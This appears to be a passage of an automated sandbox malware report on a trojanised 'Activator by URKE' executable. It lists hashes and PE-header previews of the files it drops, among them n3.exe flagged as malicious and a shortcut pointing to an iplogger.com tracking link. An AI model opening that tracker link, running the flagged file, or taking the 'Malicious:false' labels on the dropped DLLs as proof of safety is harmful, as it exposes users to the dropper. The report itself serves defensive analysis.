                                                                                                                                                                                                                                                SHA-512:C5349CE7DA5F7B55C2495A542465BC57279F90E9A4AD024C8FF1CD404F6186D2FE60CB43DF9ABA2C224376F7400483A929C66DC990EE8D8FA4302B7753C9CB85
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........?...l...l...l..Xl...l...m...l...l...l...m...l...m...l...m...l...m...l...m..l..4l...l...m...lRich...l........................PE..d....Xo8.........." .........................................................`......ke....`A.........................................f..L....h.......@..........0N......."...P.......u..T....................M..(....9...............M......4e..`....................text............................... ..`.rdata..6S...0...T..................@..@.data...@K...........j..............@....pdata..0N.......P..................@..@.didat..@....0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\drvstore.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1213768
                                                                                                                                                                                                                                                Entropy (8bit):6.359171541973069
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:TEvk+/ygtYgwpQaIVQ3xASi0p83VWEbZx5mvxm:gvkcUAi3xLC3Vr/5mvxm
                                                                                                                                                                                                                                                MD5:9AC6550A08088F7F5AF9321FF6C68728
                                                                                                                                                                                                                                                SHA1:6EA05756E76DD7E54094081E00A6889659FCEF72
                                                                                                                                                                                                                                                SHA-256:8BF3F19C650FD099CED07F11F1F2EFB1219978C21CFEF854B2FA781C55A94910
                                                                                                                                                                                                                                                SHA-512:0F6C62D8F533C40703A095CA60BFD22FA8B5EA4D63D12E41B598B9AFDA29A8A45919D4955477C07BE53FF582E16CFDBE89A278E31BB00A8668A91BF386C08BB7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..w...w...w.......w...s...w...t...w...v...w...v...w...r...w...w...w...y.1.w......w...u...w.Rich..w.................PE..d...j............",.....t................................................................`A........................................p...........X................m...d..H!..............T...........................................`C......d........................text....s.......t.................. ..`.rdata..*M.......N...x..............@..@.data....%..........................@....pdata...m.......n..................@..@.didat..0............B..............@....rsrc................F..............@..@.reloc...............J..............@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsac.resources.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2429440
                                                                                                                                                                                                                                                Entropy (8bit):5.346983681448608
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:R3q/emkzV8npDpoop09D9qUzkbQKpoupuptpyQpo:R3cHkzV8npDpoop09D9qUzkbQKpoupuY
                                                                                                                                                                                                                                                MD5:DFAD79482827257858600114C0289438
                                                                                                                                                                                                                                                SHA1:9B09BE9CC7435A311A21DBF50D3CA8CBB530F049
                                                                                                                                                                                                                                                SHA-256:5DD22C6749751E63705C52236391991C2FE5349133828442488DE5F81758B464
                                                                                                                                                                                                                                                SHA-512:703735325EB0DEF155536E6381EB34E5E4B5BA6EB43BFABE76E00ACDD440AB0DC5B6AFD2362F810695EC8C5D7F7A011F052602898D0847A235937A3489F557C5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[...........!......%..........(%.. ...@%...@.. ........................%.......%...@.................................p(%.K....@%......................`%...................................................... ............... ..H............text.....%.. ....%................. ..`.rsrc........@%.......%.............@..@.reloc.......`%.......%.............@..B.................(%.....H........&%.h...........P ..5.%..%%.....................................!O.............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP...Z.......7}...g..0...,.$,.j6M.t...6 .O./..o...o...o..\p...p....T..r..y.....>......R.[._.[...[...[...[..3...qo.Tro.IK8..K8..K8.q.v. .>..r...s.."....'..'.U.'...X...X...X..<b.9.r..&.6....|..-.-..;.............

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsadmin.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1096704
                                                                                                                                                                                                                                                Entropy (8bit):5.808109969358047
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:R6o/6L4jJBv5kFwk88vKjtowGycSIOnrBNK/bEiktXrT5IWz8Y8BJATHz:168jJBv5awp8vcFmOnrBNTiktxIFsHz
                                                                                                                                                                                                                                                MD5:AF97B3E6441701257C997AFEAF6652F1
                                                                                                                                                                                                                                                SHA1:FC2843DF3E57CC6675BF90C8284B2C5640EA156B
                                                                                                                                                                                                                                                SHA-256:AD7F4AD7934F1CBF834FC1DA418FFA6F635BD47F53FD59B5ED5912AE403C1D93
                                                                                                                                                                                                                                                SHA-512:8303856711439418B81D1946D4B70466D25F0EA8156DBB81968241C6FE5A4568EE9EAEBA19E0DB9E33930D9C75F9218F75B034B48F12F1674A6492BA5279BDB4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.K)..%z..%z..%zz.&{..%zz.!{..%zz.${$.%z..$z..%zz. {..%zz.%{..%zz.,{!.%zz..z..%zz.'{..%zRich..%z........PE..d..../.g.........." .....J................................................... .......R....`A.........................................t......du..X........A...@...O...............8..06..T...................XC..(...PB...............C...............................text....I.......J.................. ..`.rdata..VI...`...J...N..............@..@.data...\........X..................@....pdata...O...@...P..................@..@.rsrc....A.......B...@..............@..@.reloc...8.......:..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsound.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):593920
                                                                                                                                                                                                                                                Entropy (8bit):6.74945841385883
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:77Exz9If3nU5930aSmqXUO2JkxRacEGEHU3NF5bU8d5SfKJ1xBFa3D2Au7qbUxco:77E4n230aIUtgkGE0F15sW/azNQ4ABd
                                                                                                                                                                                                                                                MD5:3A192B20C6E3F6EF09FE15102DA1CC01
                                                                                                                                                                                                                                                SHA1:F315B951926D8A1BDC89704D6B0EC434987A82BA
                                                                                                                                                                                                                                                SHA-256:4C753C863E3040829BD2AA78F8F000C82B8592ABA86B07103084D7AF08DB85AB
                                                                                                                                                                                                                                                SHA-512:CD872CF12253B3CB9A7ED6E731B8A7BBD4D994CF68DBA18639B94E76CA891574724E5C867391A9E4A1447D19BF94DE33B9319BC1876AEE00C415F10CE09DDADD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c................................{.......................................Rich...................PE..d.....|..........." .........................................................`......kz....`A........................................ ...............@..........DL...........P..p.......T............................................... .......@....................text...6........................... ..`RT_CODE.o........................... ..`.rdata..\...........................@..@.data...0...........................@....pdata..DL.......N..................@..@.didat..0....0......................@....rsrc........@......................@..@.reloc..p....P......................@..B........................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsreg.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):775168
                                                                                                                                                                                                                                                Entropy (8bit):5.704956759518643
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:scxlFQOw6nRCggohFJJzeZA7aF5+sGm/IurttylAJ:HBw6RCHohzJyZKsGm/IuJIl
                                                                                                                                                                                                                                                MD5:B2FECFC27152B0F66CF5EF168777B277
                                                                                                                                                                                                                                                SHA1:A73D76EA1C3AAB04927B67B581534D0057A11ED3
                                                                                                                                                                                                                                                SHA-256:0B1A171EA7FDEE99823B799B15E92194AF59693988A40B078010AC373A2B35C8
                                                                                                                                                                                                                                                SHA-512:88ED839CD6E288E15F82FF2AC8D721DAE563AEE14081995E56482F7C344D0A43A6A77696E95C092B244BD3C6E6BC4C2EA861BE6FED6E87FA4A4B6BFC19B69471
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L.tO-.'O-.'O-.'FU8'.-.'*K.&L-.'*K.&^-.'O-.'6,.'*K.&J-.'*K.&N-.'*K.&.-.'*K.&D-.'*KT'N-.'*K.&N-.'RichO-.'........................PE..d...8..+.........." .....$................................................... ...........`A........................................PZ.......b..H........ ......42..................`...T...................XN..(...PM...............N..h....H.......................text....#.......$.................. ..`.rdata...I...@...J...(..............@..@.data................r..............@....pdata..42.......4...x..............@..@.didat..............................@....rsrc.... ....... ..................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsuiext.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):686080
                                                                                                                                                                                                                                                Entropy (8bit):5.482726150891449
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:kak1FU7vxVkIiYAllhMsWlOzrMMMMMMMMMkMMMMMMMMMC33:TkmAlYsWlO/MMMMMMMMMkMMMMMMMMMG3
                                                                                                                                                                                                                                                MD5:5BCF50340567D5FE3403CCB896632473
                                                                                                                                                                                                                                                SHA1:40830DC9EC229C5C6F953C42CA2F6E0C364B415F
                                                                                                                                                                                                                                                SHA-256:B2853768322AF509C21CC575CF3A45601A6555439EAAD0DE59082EB451B5753A
                                                                                                                                                                                                                                                SHA-512:9EBB05713EF4A88B1869CD939F894BC1F81B1E1EAFFFFB1B35A57894B184FFC46D1F287EF09795AF1C4A6CBA060D73A5C38ECCAE44DC22F14D6DD25B65B54B95
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8D.8|%.k|%.k|%.ku].kP%.k.C.j.%.k.C.jm%.k|%.k.%.k.C.jo%.k.C.j~%.k.C.j}%.k.C.jn%.k.Ctk}%.k.C.j}%.kRich|%.k........................PE..d................" ................................................................a.....`A.........................................#.......-...........0...`..........................T...................x...(...p........................"..@....................text............................... ..`.rdata..~P.......R..................@..@.data........P.......0..............@....pdata.......`.......8..............@..@.didat.......p.......B..............@....rsrc....0.......2...D..............@..@.reloc...............v..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dui70.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1761280
                                                                                                                                                                                                                                                Entropy (8bit):6.478420482223799
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:Xmxetxu5hr1PRGIgT60vZnistePozk21e5m8Ar/iMkR9:wJr1PpgBioegzk21e4j5e9
                                                                                                                                                                                                                                                MD5:F6C6C233D2A04EBD35DB2797E6110A15
                                                                                                                                                                                                                                                SHA1:378098B2214E091FD5C5541AB563D82FF12D5666
                                                                                                                                                                                                                                                SHA-256:95C058E3484A169A0C315941DA5E306635AFC2D49B3C91D8F565DDCAAAC7153B
                                                                                                                                                                                                                                                SHA-512:5812D68338CB16493DFA46348F8AE549E566F6FE3A21E42E9B9BCFE07D63349ECC42B7EF3147A451BE6A7733671646E6092C03A60E58E478A205D5A81E6C4886
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........._..............;.........................=.....................................W.............Rich............PE..d....6.:.........." .....$..........p........................................P............`A.............................................Q...l...................................Y...O..T....................O..(....*.............. .......P...@....................text...x".......$.................. ..`.rdata...]...@...^...(..............@..@.data....A..........................@....pdata..............................@..@.didat..............................@....rsrc...............................@..@.reloc...Y.......Z..................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\duser.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):581120
                                                                                                                                                                                                                                                Entropy (8bit):6.322357614878576
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:+8LM3srHOJ8d8mOQw3EJ19WaCxC6xHlwfg+xX52bKcA8rZfl6va0EQJuq5UGvN:zrHO2d9w3EJDT2lwg+1wb5ymQ53
                                                                                                                                                                                                                                                MD5:171D55444F35EB903900CFCE0E1BE83A
                                                                                                                                                                                                                                                SHA1:F5F2AE36D2E002B1119171FA84A0DD1341F91580
                                                                                                                                                                                                                                                SHA-256:48651EFFB6FF0090B513A84F21CA85689C412A68A8A6F8C0F2EA391B97BB28A2
                                                                                                                                                                                                                                                SHA-512:1427B5DFF77157A5544EC821EADC020499262CE6235BEF2E5D18D2966112AC354098578A0E0AAACE207E87EE1F37F737F03A658AE21EAF92813F48F24CA8C1CB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.|*..|*..|*......|*...)..|*......|*..|+..}*...+..|*.../..|*...*..|*...$.6|*.....|*...(..|*.Rich.|*.........PE..d...:.30.........." .........n......0K.......................................@.......U....`A................................................................ ...b...........0..l...P...T.......................(......................h............................text............................... ..`.rdata..>).......*..................@..@.data....F.......2..................@....pdata...b... ...d..................@..@.didat...............F..............@....rsrc...............H..............@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dwmcore.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3488768
                                                                                                                                                                                                                                                Entropy (8bit):6.232543570904378
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:iue6zsrGiHXOmuBk7Qb0bTfXUgt6Ltj4zi/ZU9LE/h5H2S5Tr:iOsnAb6j+ZU9LEK
                                                                                                                                                                                                                                                MD5:FF3C52B9B006E76E972CDD398E2D0033
                                                                                                                                                                                                                                                SHA1:D5BA536CDC6C6E9E91B1437B20B646C3208D83EA
                                                                                                                                                                                                                                                SHA-256:03EF9CE62383077DBF3BFDA0A60FB573EBD8495CF0FFA649295DDA328B8C4071
                                                                                                                                                                                                                                                SHA-512:6230EA9451A4A81EFC6F15FD1A035F0A07D975E800FA84C3ED3F59120D05A8E88B0831BB163BC8F68E8430605D10F2D304B7930E9893BBA2F6B997A369EB4EE1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+..oi..oi..oi..f./..i.......i......li......{i..oi...l......~i......ni.......k....A.ni....C.ni......ni..Richoi..................PE..d.....?M.........." ......#...................................................5......5...`A........................................../. ...0./.`.....2.@.....0..............p5..K..0.*.T...................`.#.(.....#..............3$......./. ....................text.....".......#................. ..`.rdata..P.....#.......#.............@..@.data....u....0..(....0.............@....pdata........0......(0.............@..@.didat........2.......2.............@....rsrc...@.....2.......2.............@..@.reloc...K...p5..L....4.............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxcompiler.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):21758056
                                                                                                                                                                                                                                                Entropy (8bit):6.539984429791003
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:393216:t48ZWKUwK0e/AKjImUQfTXKvc2V5bI1/lumndlL/bioKr6jBX2bcbkXSTrE3qIsG:BPe9W
                                                                                                                                                                                                                                                MD5:CED63313F64D67F0B624FEFBABDE2B2C
                                                                                                                                                                                                                                                SHA1:913CF60DC59E995D45FD635CAC76AE9976F71BED
                                                                                                                                                                                                                                                SHA-256:6993FB23FC5DC50893133352D6A925D890633241C637361AB86C610A7C41C1F4
                                                                                                                                                                                                                                                SHA-512:8C151FA15F3C8618ECF4BB212F2E4B6CC1CB9E745DC2FDCB44A1426F6FCF21B7AD8954A8752CA275C904B4800848ECCFCCDA655D930E8F26624F336422F21177
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d..../.f.........." .........4B...............................................L.......L...`A..........................................#.p.....#.x....PK......PB......K.h(...`K......P#.8....................O#.(...0...@........... .#..............................text...v........................... ..`.rdata....7.......7.................@..@.data.........A..n....A.............@....pdata......PB.......A.............@..@.gxfg....0....J..2....J.............@..@.retplne..... K.......J..................tls.........0K.......J.............@..._RDATA.......@K.......J.............@..@.rsrc........PK.......J.............@..@.reloc.......`K.......J.............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxgi.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):780424
                                                                                                                                                                                                                                                Entropy (8bit):6.114771861020801
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:hiYH20/vlD+Hu0JXoIaJGSkARc1GFk8vrEalSm3oNma:p/vOXqIawSkQJTlSm3n
                                                                                                                                                                                                                                                MD5:10F43D35F09BC66AC6DBF8B861E6DFAF
                                                                                                                                                                                                                                                SHA1:53DB0949CFDB2F2A0F85AF5BFBB0B6B4FA03FDA5
                                                                                                                                                                                                                                                SHA-256:E5D44473381BC1A7A4BDB598E5162E336CE5C3A8287628FD1A1E92293CA00794
                                                                                                                                                                                                                                                SHA-512:6B5E1C7F87A8D4BD0F300777AA2C4ABA28469B8DE766FF878B11260CA58DEB6ACF47A5E3CDA5697F8154F74E1F3F3BA92C8D0F1A1701159143842ACB3921A12E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PD...D...D...M.b.....!...G...!...S...D.......!...M...!...N...!...E...!...b...!...E...!...E...RichD...................PE..d.....3%.........." .....,...........*....................................... ......j^....`A...............................................d............x......Xh.......<.......... 9..T...........................................h...p......`....................text....+.......,.................. ..`.rdata...z...@...|...0..............@..@.data...\1..........................@....pdata..Xh.......j..................@..@.didat..8....p......................@....rsrc....x.......z... ..............@..@.reloc..............................@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxil.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1508360
                                                                                                                                                                                                                                                Entropy (8bit):6.500809535302983
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:+Cfhbh3v3mtZDiAQeWj26k41ob2nrZ1rqpegQDJqoZtp22GkmgA9u808jQPEdkrt:+Cfhbh3v3mtEAQrW41obCraeRhy9ou6f
                                                                                                                                                                                                                                                MD5:30DA04B06E0ABEC33FECC55DB1AA9B95
                                                                                                                                                                                                                                                SHA1:DE711585ACFE49C510B500328803D3A411A4E515
                                                                                                                                                                                                                                                SHA-256:A5FE1D8D9CAA2FF29DAFFD53F73A9A4E19C250351B2ABE4FC7B57E60CE67AC68
                                                                                                                                                                                                                                                SHA-512:67790874377E308D1448D0E41DF9DD353A5F63686DF4EB9A8E70A4DA449B0C63A5D3655AB38D24B145AD3C57971B1C6793EA6C5AC2257B6EB2E8964A44AB0F08
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@AC.. -.. -.. -.OX).1 -.OX... -.OX(.. -.VU(.. -..R,.. -.. ,.. -.OX$.. -.OX-.. -.OX.. -.. ... -.OX/.. -.Rich. -.................PE..d...'..}.........." ........."...............................................@.......6....`A............................................l...l...P............`..t........&... .......o..p....................o..(....m..@............................................text...\........................... ..`.rdata..F...........................@..@.data....{.......T..................@....pdata..t....`......."..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17110528
                                                                                                                                                                                                                                                Entropy (8bit):6.644998400324389
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:98304:637m86Iero/F6fQHpqIQ+hv5gW738nWHyizf61hbNxTJrtktFE5uUNkVg3N:VpAQIQwv5gW7fHyi8xUFE5uUEg3N
                                                                                                                                                                                                                                                MD5:2706AC6F789E6BDBDA8DAE9D8460FEC8
                                                                                                                                                                                                                                                SHA1:B29D7E5136FC6311FAB7260AC89B8365D31E70B8
                                                                                                                                                                                                                                                SHA-256:E9A3332B33847BADBA4E5D5377367A24C242007992F4F387B06ECA0C18638E54
                                                                                                                                                                                                                                                SHA-512:1A96539469F3E7AD975DB1A59B8D8624972527DCC807B9D0BFE90C99A349D71545D8EDDA64E7E3096E9F721D60852F9168725FD7226FD32626D7544482CDE53A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................RS...T...................@..........................0............@.....................................^........r..........................................................................................................text....QS......RS................. ..`.rdata..|7X..pS..8X..VS.............@..@.data...`GX.......S.................@....idata..^...........................@....reloc..............................@..B.symtab................................B.rsrc....r.......t..................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\uros.url

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:Generic INItialization configuration [InternetShortcut]
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):117
                                                                                                                                                                                                                                                Entropy (8bit):4.786082470547285
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfdCCADM:J254vVG/4xPpuFJQxdCCADM
                                                                                                                                                                                                                                                MD5:D77C01D7DB360878FDDE23DFF64286C3
                                                                                                                                                                                                                                                SHA1:5F8FDF8D870C6364CC93154C964A9C71615F85DB
                                                                                                                                                                                                                                                SHA-256:41E9B16667F5601DA92A5DF14BA84C1DDD15BAE805ED861C3C8E90A9A0FFCCEB
                                                                                                                                                                                                                                                SHA-512:110B92C473DA9FBE416CCC37A29090858AA08662594EFB6D3EC1E39D7E6017A31400ED06848C415D4FD720E8565FD00DADF6A061FE17B47CF680305919B5EAB5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://iplogger.com/1KhnJ4..

                                                                                                                                                                                                                                                Chrome Cache Entry: 71

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                                                                                                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

                                                                                                                                                                                                                                                Chrome Cache Entry: 72

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
